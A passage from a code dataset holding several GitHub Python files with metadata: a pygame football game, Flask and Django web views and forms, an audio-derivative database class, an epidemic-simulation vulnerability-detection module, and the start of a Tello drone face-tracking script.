{"api_name": "utility.timeutility.TimeUtility.DATE_FORMAT_DEFAULT", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utility.common.Common.checktitle", "line_number": 72, "usage_type": "call"}, {"api_name": "utility.common.Common", "line_number": 72, "usage_type": "name"}, {"api_name": "utility.timeutility.TimeUtility.getuniformdate", "line_number": 73, "usage_type": "call"}, {"api_name": "utility.timeutility.TimeUtility", "line_number": 73, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 74, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "attribute"}, {"api_name": "utility.timeutility.TimeUtility.DATE_FORMAT_DEFAULT", "line_number": 74, "usage_type": "attribute"}, {"api_name": "utility.timeutility.TimeUtility", "line_number": 74, "usage_type": "name"}, {"api_name": "configuration.constant.SPIDER_S2_WEBSITE_VIDEO", "line_number": 84, "usage_type": "argument"}, {"api_name": "utility.common.Common.urlenc", "line_number": 92, "usage_type": "call"}, {"api_name": "utility.common.Common", "line_number": 92, "usage_type": "name"}, {"api_name": "log.spiderlog.Logger.getlogging", "line_number": 102, "usage_type": "call"}, {"api_name": "log.spiderlog.Logger", "line_number": 102, "usage_type": "name"}, {"api_name": "utility.common.Common.urlenc", "line_number": 116, "usage_type": "call"}, {"api_name": "utility.common.Common", "line_number": 116, "usage_type": "name"}, {"api_name": "lxml.etree.HTML", "line_number": 119, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 119, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 127, "usage_type": "call"}, {"api_name": "log.spiderlog.Logger.getlogging", "line_number": 138, "usage_type": "call"}, {"api_name": "log.spiderlog.Logger", "line_number": 138, "usage_type": "name"}]} +{"seq_id": "5444225137", "text": "import pygame as p\r\n\r\np.init()\r\n\r\nwin = p.display.set_mode((1200,700))\r\np.display.set_caption('Football!')\r\nicon = p.image.load('ball32.png')\r\np.display.set_icon(icon)\r\n\r\nbackground = p.image.load('field1.jpg')\r\n\r\nballimg = p.image.load('ball64.png')\r\nbx = 568\r\nby = 318\r\nbdx = 0\r\nbdy = 0\r\n\r\np1img = p.image.load('player1.png')\r\np1x = 306\r\np1y = 288\r\np1dx = 0\r\np1dy = 0\r\n\r\np2img = p.image.load('player2.png')\r\np2x = 766\r\np2y = 288\r\np2dx = 0\r\np2dy = 0\r\n\r\n\r\ndef ball(x,y):\r\n 
win.blit(ballimg, (x,y))\r\n\r\ndef p1(x,y):\r\n win.blit(p1img, (x,y))\r\n\r\ndef p2(x,y):\r\n win.blit(p2img, (x,y))\r\n\r\n\r\nrunning = True\r\nwhile running:\r\n\r\n win.blit(background, (0,0))\r\n\r\n for event in p.event.get():\r\n if event.type == p.QUIT:\r\n running = False\r\n if event.type == p.KEYDOWN:\r\n if event.key == p.K_a: \r\n p1dx = -1\r\n if event.key == p.K_d: \r\n p1dx = 1\r\n if event.key == p.K_w: \r\n p1dy = -1\r\n if event.key == p.K_s: \r\n p1dy = 1\r\n if event.key == p.K_LEFT: \r\n p2dx = -1\r\n if event.key == p.K_RIGHT: \r\n p2dx = 1\r\n if event.key == p.K_UP: \r\n p2dy = -1\r\n if event.key == p.K_DOWN: \r\n p2dy = 1\r\n \r\n if event.type == p.KEYUP:\r\n if event.key == p.K_a or event.key == p.K_d or event.key == p.K_w or event.key == p.K_s:\r\n p1dx = 0\r\n p1dy = 0\r\n if event.key == p.K_LEFT or event.key == p.K_RIGHT or event.key == p.K_UP or event.key == p.K_DOWN:\r\n p2dx = 0\r\n p2dy = 0\r\n \r\n \r\n p1x += p1dx\r\n p1y += p1dy\r\n\r\n p2x += p2dx\r\n p2y += p2dy\r\n\r\n bx += bdx\r\n by += bdy\r\n \r\n\r\n if p1x < 0:\r\n p1x = 0\r\n if p1x > 1072:\r\n p1x = 1072\r\n if p1y < 0:\r\n p1y = 0\r\n if p1y > 572:\r\n p1y = 572\r\n \r\n if p2x < 0:\r\n p2x = 0\r\n if p2x > 1072:\r\n p2x = 1072\r\n if p2y < 0:\r\n p2y = 0\r\n if p2y > 572:\r\n p2y = 572\r\n\r\n if p1x - bx > -128 and p1x - bx < -64 and p1y - by > -127 and p1y - by < 63:\r\n bx = p1x + 128\r\n bdx = 0.5\r\n \r\n if p1x - bx < 64 and p1x - bx > 0 and p1y - by > -127 and p1y - by < 63:\r\n bx = p1x - 64\r\n bdx = -0.5\r\n\r\n if p1y - by > -128 and p1y - by < -64 and p1x - bx > -127 and p1x - bx < 63:\r\n by = p1y + 128\r\n bdy = 0.5\r\n \r\n\r\n if p1y - by < 64 and p1y - by > 0 and p1x - bx > -127 and p1x - bx < 63:\r\n by = p1y - 64\r\n bdy = -0.5\r\n\r\n \r\n if p2x - bx > -128 and p2x - bx < -64 and p2y - by > -127 and p2y - by < 63:\r\n bx = p2x + 128\r\n bdx = 0.5\r\n \r\n if p2x - bx < 64 and p2x - bx > 0 and p2y - by > -127 and p2y - by < 63:\r\n bx = p2x - 64\r\n bdx = -0.5\r\n\r\n if p2y - by > -128 and p2y - by < -64 and p2x - bx > -127 and p2x - bx < 63:\r\n by = p2y + 128\r\n bdy = 0.5\r\n \r\n\r\n if p2y - by < 64 and p2y - by > 0 and p2x - bx > -127 and p2x - bx < 63:\r\n by = p2y - 64\r\n bdy = -0.5\r\n\r\n\r\n if p1x - p2x > -128:\r\n p1dx = 0\r\n p2dx = 0\r\n \r\n\r\n if bx <0:\r\n bx = 0\r\n bdx *= -1\r\n if bx > 1136:\r\n bx = 1136\r\n bdx *= -1\r\n if by < 0:\r\n by = 0\r\n bdy *= -1\r\n if by > 636:\r\n by = 636\r\n bdy *= -1\r\n\r\n\r\n\r\n\r\n ball(bx,by)\r\n p1(p1x,p1y)\r\n p2(p2x,p2y)\r\n\r\n \r\n \r\n p.display.update()", "repo_name": "iitimii/unfinished-football-game", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 3, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 8, "usage_type": "attribute"}, 
{"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 50, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 67, "usage_type": "attribute"}, {"api_name": "pygame.K_a", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_d", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_w", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_s", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 167, "usage_type": "attribute"}]} +{"seq_id": "18975207585", "text": "from typing import List, Dict\nfrom pathlib import Path\nfrom tools.configuration import DatabaseConfig\nfrom tools.db import connectToDB, get_entry_id_or_create_it\nfrom joblib import Parallel, delayed\nfrom tools.logging import error\nfrom os import mkdir\n\n\nclass DerivativeBaseClass:\n name: str\n id: int\n db_config: DatabaseConfig\n derivate_folder_path: Path\n realtive_derivative_folder_path: Path\n file_ending: str = None\n name: str = None\n sample_rate: int = None\n bit_depth: int = None\n description: str = None\n overwrite: bool = False\n\n def __init__(self, config: DatabaseConfig, overwrite=False):\n self.overwrite = overwrite\n for field in [\"name\", \"sample_rate\", \"bit_depth\", \"file_ending\", \"description\"]:\n if getattr(self, field) is None:\n raise ValueError(\n \"Missing Class field {} for DerivativeClass, Please add it to your subclass\".format(\n field\n )\n )\n self.db_config = config\n with connectToDB(config) as db_connection:\n with db_connection.cursor() as db_cursor:\n data = [\n (\"name\", self.name),\n (\"sample_rate\", self.sample_rate),\n (\"bit_depth\", self.bit_depth),\n (\"description\", 
self.description),\n ]\n self.id = get_entry_id_or_create_it(db_cursor, \"derivative\", data, data)\n db_connection.commit()\n self.derivate_folder_path = (\n config.get_derivatives_files_path().joinpath(str(self.id))\n )\n self.realtive_derivative_folder_path = (\n self.derivate_folder_path.relative_to(config.file_storage_path)\n )\n if self.derivate_folder_path.exists() is False:\n mkdir(self.derivate_folder_path)\n\n def create_derivate(source_file_path: Path, target_file_path: Path) -> None:\n \"\"\"Return derivate filePath if exists or create Derivative\"\"\"\n raise NotImplementedError\n\n def add_derivate_to_dict(self, filepath: Path) -> None:\n\n source_file_path: Path = self.db_config.get_originals_files_path().joinpath(\n filepath.as_posix()\n )\n source_file_name = \"{}\".format(filepath.name)\n if source_file_path.exists() is False:\n error(\"File Not found: {}\".format(source_file_path))\n return (source_file_name, None)\n # Create Ending for wav\n # calculate database files sub folders\n target_file_ending = filepath.with_suffix(\".{}\".format(self.file_ending))\n target_file_path: Path = self.derivate_folder_path.joinpath(target_file_ending)\n realtive_target_file_path = self.realtive_derivative_folder_path.joinpath(\n target_file_ending\n )\n if target_file_path.exists() is False or self.overwrite:\n target_file_path.parent.mkdir(parents=True, exist_ok=True)\n try:\n self.create_derivate(source_file_path, target_file_path)\n except:\n print(\"Could not convert: {}\".format(source_file_path))\n target_file_path = None\n if target_file_path is None or target_file_path.exists() == False:\n print(\"File not found {}\".format(target_file_path))\n return (source_file_name, None)\n else:\n return (source_file_name, realtive_target_file_path)\n\n def get_original_derivate_dict(\n self, filepathes: List[Path], n_jobs=-1\n ) -> Dict[str, Path]:\n\n resultList = Parallel(n_jobs=n_jobs)(\n delayed(self.add_derivate_to_dict)(filepath) for filepath in filepathes\n )\n\n return dict(resultList)\n", "repo_name": "hdogan84/database", "sub_path": "src/derivates/DerivativeBaseClasss.py", "file_name": "DerivativeBaseClasss.py", "file_ext": "py", "file_size_in_byte": 3805, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tools.configuration.DatabaseConfig", "line_number": 13, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 15, "usage_type": "name"}, {"api_name": "tools.configuration.DatabaseConfig", "line_number": 23, "usage_type": "name"}, {"api_name": "tools.db.connectToDB", "line_number": 33, "usage_type": "call"}, {"api_name": "tools.db.get_entry_id_or_create_it", "line_number": 41, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 50, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 52, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 58, "usage_type": "name"}, {"api_name": "tools.logging.error", "line_number": 63, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 68, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 86, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 86, "usage_type": "name"}, {"api_name": "joblib.Parallel", "line_number": 89, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 90, "usage_type": "call"}, {"api_name": 
"typing.Dict", "line_number": 87, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "25712506202", "text": "from data import forums\nfrom flask import Blueprint, render_template\n\nforum = Blueprint('forum',__name__,url_prefix='/forum')\n\n@forum.route(\"/\")\ndef forumpage(forum_id):\n subforumlist = forums.get_subforums(forum_id)\n forumname = forums.get_forum_name(forum_id)\n return render_template(\"forum.html\", subforumlist=subforumlist, forum_id=forum_id, forumname=forumname)\n", "repo_name": "karhis/Tsohafoorumi", "sub_path": "views/forum.py", "file_name": "forum.py", "file_ext": "py", "file_size_in_byte": 386, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 4, "usage_type": "call"}, {"api_name": "data.forums.get_subforums", "line_number": 8, "usage_type": "call"}, {"api_name": "data.forums", "line_number": 8, "usage_type": "name"}, {"api_name": "data.forums.get_forum_name", "line_number": 9, "usage_type": "call"}, {"api_name": "data.forums", "line_number": 9, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "27385089017", "text": "import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n\r\n\r\n\r\ndef plot_line(value_list, item_id, app_id, zone_id):\r\n value_list = value_list[1:-2].split(\",\")\r\n try:\r\n value_list = list(map(lambda x: float(x), value_list))\r\n plt.figure()\r\n plt.plot(list(range(len(value_list))), value_list, color=\"r\")\r\n plt.savefig(f\"./plot/plot_item_{item_id}_app_{app_id}_zone_{zone_id}.png\")\r\n plt.close()\r\n except:\r\n\r\n print(f\"[Info] The item id {item_id}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n os.makedirs(\"./plot\")\r\n except:\r\n pass\r\n data = pd.read_csv(\"part_dataframe.csv\", index_col=None, header=0)\r\n value_list = data.at[0, 'y']\r\n print(data)\r\n print(data.dtypes)\r\n # print(value_list[1:-2].split(\",\"))\r\n data.apply(lambda x: plot_line(value_list=x['y'], item_id=x['item_id'],\r\n app_id=x['app_id'], zone_id=x['zone_id']), axis=1)\r\n", "repo_name": "ZiciuCanJustus/SKLCarAccident", "sub_path": "plot_period.py", "file_name": "plot_period.py", "file_ext": "py", "file_size_in_byte": 981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "19168067068", "text": "from django.shortcuts import render, HttpResponse, redirect\nfrom .models import *\nfrom django.contrib import messages\nimport bcrypt\n\ndef index(request):\n return render(request, 'first_app/index.html')\n\ndef 
process(request):\n # if a form is posted in we will use the validator method which we call -errors-\n if request.method == 'POST':\n errors = User.objects.validator(request.POST)\n # method is checking if there are any errors\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n # if there are errots this redirects to the user form so they can reenter the correct information\n return redirect(index)\n # if there are no errors, we will continue by hashing the password and entering that information into the DB\n else: \n hash1= bcrypt.hashpw(request.POST['password'].encode(), bcrypt.gensalt())\n user = User(first_name = request.POST['first_name'], last_name = request.POST['last_name'], email = request.POST['email'], password = hash1)\n user.save()\n # information that was posted, we will now put into session\n request.session['id'] = user.id\n request.session['name'] = user.first_name \n messages.success(request, \"Registration was successful\")\n return redirect('/')\n \n\ndef login(request):\n if request.method == 'POST':\n errors = User.objects.login_validation(request.POST)\n # checks if there are any errors while trying to login in\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n # if there are any errors, redirect to main page\n return redirect('/')\n # otherwise we will get the user info by their email\n email = request.POST['email']\n user = User.objects.get(email = email)\n # whatever id is obtained from the user that is logged in, we will put their id within session\n request.session['id'] = User.objects.get(email = email).id\n # we will also get user's name through the email they logged in with\n request.session['first_name'] = User.objects.get(email = email).first_name\n return redirect('/dashboard')\n\ndef dashboard(request):\n if 'id' in request.session:\n context = {\n 'users' : User.objects.get(id = request.session['id']),\n # 'this_user_job' : User.objects.filter(id = request.session['id']).uploads,\n 'jobs' : Job.objects.all()\n }\n # print(context['this_user_job'])\n return render(request, 'first_app/dashboard.html', context)\n else: \n return redirect ('/')\n\ndef add_process(request):\n if request.method == 'POST':\n errors = Job.objects.job_validation(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n return redirect('/add')\n else:\n Job.objects.create(title = request.POST['title'], desc = request.POST['desc'], location = request.POST['location'], user = User.objects.get(id = int(request.session['id'])))\n return redirect('/dashboard')\n\ndef addJob(request):\n return render(request, 'first_app/addjob.html')\n\ndef editprocess(request):\n url= \"/edit/\" + str(request.session['id'])\n if request.method == 'POST':\n if 'id' in request.session:\n errors = User.objects.job_validation(request.POST)\n if len(errors):\n for key, value in errors.items():\n messages.error(request, value)\n return redirect(url)\n else: \n job = Job.objects.get( id = request.session['id'])\n job.title = request.POST['title']\n job.desc = request.POST['desc']\n job.location = request.POST['location']\n job.save()\n messages.success(request, \"Job was updated\")\n return redirect(url)\n \ndef edit(request, id):\n jobs = Job.objects.get(id = id)\n context = {\n 'jobs': jobs\n }\n return render (request, 'first_app/edit.html', context)\n\ndef done(request, id):\n delete_job = Job.objects.get(id = id)\n delete_job.delete()\n return redirect('/dashboard')\n\ndef view(request, 
id):\n jobs = Job.objects.filter(id = id)\n context = {\n 'jobs': jobs\n }\n return render(request, 'first_app/jobinfo.html', context)\n\ndef logout(request):\n request.session.clear()\n return redirect('/')\n\ndef myJob(request):\n user = User.objects.get(id = request.session['id'])\n jobs = Job.objects.filter(user = id)\n context = {\n 'jobs': jobs\n }\n return redirect('/dashboard')\n\n\n", "repo_name": "ngoalexandra/handy_helper", "sub_path": "main/apps/first_app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4751, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.shortcuts.render", "line_number": 7, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "bcrypt.hashpw", "line_number": 21, "usage_type": "call"}, {"api_name": "bcrypt.gensalt", "line_number": 21, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 27, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 27, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 37, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 37, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 47, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 59, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 66, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 70, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.messages.error", "line_number": 82, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 82, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 83, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 90, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 90, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 91, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 98, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 103, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 110, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 114, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 122, "usage_type": "call"}]} +{"seq_id": "6023121096", "text": "from typing import Callable, Union\n\nfrom episimmer.read_file import ReadVDConfiguration\nfrom episimmer.vulnerability_detection.base import AgentVD, EventVD\nfrom episimmer.world import World\n\n\nclass VD():\n \"\"\"\n Class for implementing all types of 
Vulnerability Detection modules.\n\n Args:\n vd_config_obj: ReadVDConfiguration object\n world_obj: World object of simulation\n \"\"\"\n def __init__(self, vd_config_obj: ReadVDConfiguration, world_obj: World):\n self.vd_config_obj: ReadVDConfiguration = vd_config_obj\n self.world_obj: World = world_obj\n\n def get_class(self, name: str) -> Callable:\n \"\"\"\n Returns the class of the vulnerability detection module.\n\n Args:\n name: Name of module given as a string\n\n Returns:\n Class of vulnerability detection module\n \"\"\"\n components = name.split('.')\n\n mod = __import__(components[0])\n for comp in components[1:]:\n mod = getattr(mod, comp)\n return mod\n\n def add_target_name(self) -> str:\n \"\"\"\n Returns the name of python file for given user target.\n\n Returns:\n Name of python file\n \"\"\"\n path = ''\n if self.vd_config_obj.target.lower() == 'agent':\n path = 'agent_vd'\n elif self.vd_config_obj.target.lower() == 'event':\n path = 'event_vd'\n else:\n raise Exception('Input valid target')\n\n return path\n\n def get_algorithm(self) -> Callable:\n \"\"\"\n Returns the class of the vulnerability detection algorithm based on user input in vd_config.txt.\n\n Returns:\n Class of the vulnerability detection algorithm\n \"\"\"\n class_path = 'vulnerability_detection' + '.' + self.add_target_name(\n ) + '.' + self.vd_config_obj.algorithm\n algorithm_class = self.get_class(class_path)\n\n return algorithm_class\n\n def run_vul_detection(self) -> None:\n \"\"\"\n Runs the vulnerability detection algorithm\n \"\"\"\n algorithm_class = self.get_algorithm()\n algo_object = algorithm_class(self.world_obj,\n self.vd_config_obj.parameter_dict)\n algo_object.run_detection()\n self.run_output(algo_object)\n\n def run_output(self, algo_object: Union[AgentVD, EventVD]) -> None:\n \"\"\"\n This function by default prints 10 maximum and 10 minimum scores post detection.\n\n Args:\n algo_object: Object of the vulnerability detection module\n \"\"\"\n if (self.vd_config_obj.output_mode == 'Default'\n or self.vd_config_obj.output_mode == ''):\n algo_object.print_default_output(10)\n\n def run_preprocess(self) -> None:\n \"\"\"\n Functionality to be run pre detection\n \"\"\"\n pass\n\n def run_postprocess(self) -> None:\n \"\"\"\n Functionality to be run post detection\n \"\"\"\n pass\n", "repo_name": "healthbadge/episimmer", "sub_path": "episimmer/vulnerability_detection/vd.py", "file_name": "vd.py", "file_ext": "py", "file_size_in_byte": 2984, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "53", "api": [{"api_name": "episimmer.read_file.ReadVDConfiguration", "line_number": 16, "usage_type": "name"}, {"api_name": "episimmer.world.World", "line_number": 16, "usage_type": "name"}, {"api_name": "episimmer.read_file.ReadVDConfiguration", "line_number": 17, "usage_type": "name"}, {"api_name": "episimmer.world.World", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 77, "usage_type": "name"}, {"api_name": "episimmer.vulnerability_detection.base.AgentVD", "line_number": 77, "usage_type": "name"}, {"api_name": "episimmer.vulnerability_detection.base.EventVD", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "16552792538", "text": "from django import forms\nfrom .models import Comment, SubscribeEmail\nfrom django.core.exceptions import 
ValidationError\n\n\nclass CommentForm(forms.ModelForm):\n class Meta:\n model = Comment\n exclude = ('create_at', 'post')\n widgets = {\n 'name': forms.TextInput(attrs={'placeholder': 'Name'}),\n 'email': forms.EmailInput(attrs={'placeholder': 'Email'}),\n 'website': forms.URLInput(attrs={'placeholder': 'Your website'}),\n 'message': forms.Textarea(attrs={'placeholder': 'Your message'}),\n }\n\n\nclass EmailSubscribeForm(forms.ModelForm):\n email = forms.EmailField(label='',\n widget=forms.EmailInput(attrs={'class': 'email-input', 'placeholder': 'Your email'}))\n\n class Meta:\n model = SubscribeEmail\n fields = ('email',)\n", "repo_name": "Grayder0152/Cook-Blog", "sub_path": "blog/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 838, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelForm", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "models.Comment", "line_number": 8, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 11, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 11, "usage_type": "name"}, {"api_name": "django.forms.EmailInput", "line_number": 12, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 12, "usage_type": "name"}, {"api_name": "django.forms.URLInput", "line_number": 13, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 13, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 14, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.EmailField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 19, "usage_type": "name"}, {"api_name": "django.forms.EmailInput", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "models.SubscribeEmail", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "70966642409", "text": "from djitellopy import Tello\nimport cv2\nimport numpy as np\n\n\ndef telloInit():\n '''\n Initialize the drone, set velocities to 0, display battery percentage, restart the stream\n :returns initialized Drone object\n '''\n\n # Initialize the drone\n dronik = Tello()\n dronik.connect()\n dronik.for_back_velocity = 0\n dronik.left_right_velocity = 0\n dronik.up_down_velocity = 0\n dronik.yaw_velocity = 0\n dronik.speed = 0\n\n # Get battery values in console\n print(f'Amount of battery left {dronik.get_battery()} %')\n\n # Restart the stream\n dronik.streamoff()\n dronik.streamon()\n\n return dronik\n\n\ndef frameGrabber(dronik, w=360, h=240):\n '''\n Function that grabs a frame from Tello camera and returns it resized.\n :param dronik: instance of Tello object\n :param w: width of output frame\n :param h: heigth of output frame\n :return: resized frame\n '''\n frame = dronik.get_frame_read()\n frame = frame.frame\n frame_resized = cv2.resize(frame, (w, h))\n\n return frame_resized\n\n\ndef faceFinder(frm):\n \"\"\"\n :param frm: frame from drone camera\n :return: frm - the same frame with rectangles on main face detected\n \"\"\"\n faceCascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n imgGray = 
